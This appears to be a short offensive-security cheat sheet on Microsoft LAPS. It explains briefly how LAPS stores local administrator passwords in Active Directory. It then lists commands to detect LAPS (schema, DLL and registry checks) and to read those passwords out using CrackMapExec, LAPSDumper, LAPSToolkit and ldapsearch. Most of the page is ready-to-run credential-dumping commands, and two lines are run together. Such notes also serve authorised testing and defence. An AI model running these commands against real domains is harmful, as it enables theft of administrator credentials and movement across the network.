Microsoft LAPS provides automated local administrator account management for every computer in Active Directory. The client-side piece of LAPS on the computer generates a random secure password and stores it in the AD attribute for the computer password. This is considered secure and mitigates an attacker passing the local administrator hash throughout the domain.
# Using the cmdlet Get-ADObject
Get-ADObject 'CN=mc-mcs-admpwd,CN=Schema,CN=Configuration,DC=dc,DC=parzival,DC=com'
# Check if the DLL is installed locally
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
dir "C:\Program Files\LAPS\CSE"
# Checking registry
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled# Retrieve password using CrackMapExec
cme ldap $dc -u $username -p $password -M laps
# https://github.com/n00py/LAPSDumper
python laps.py -u $username -p $password -d $domain
# https://github.com/leoloobeek/LAPSToolkit
Get-LAPSComputers
# Manually with LDAP
ldapsearch -x -h $host -D $user -w $password -b "dc=$domain,dc=com" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd{% embed url="https://adsecurity.org/?p=1790" %}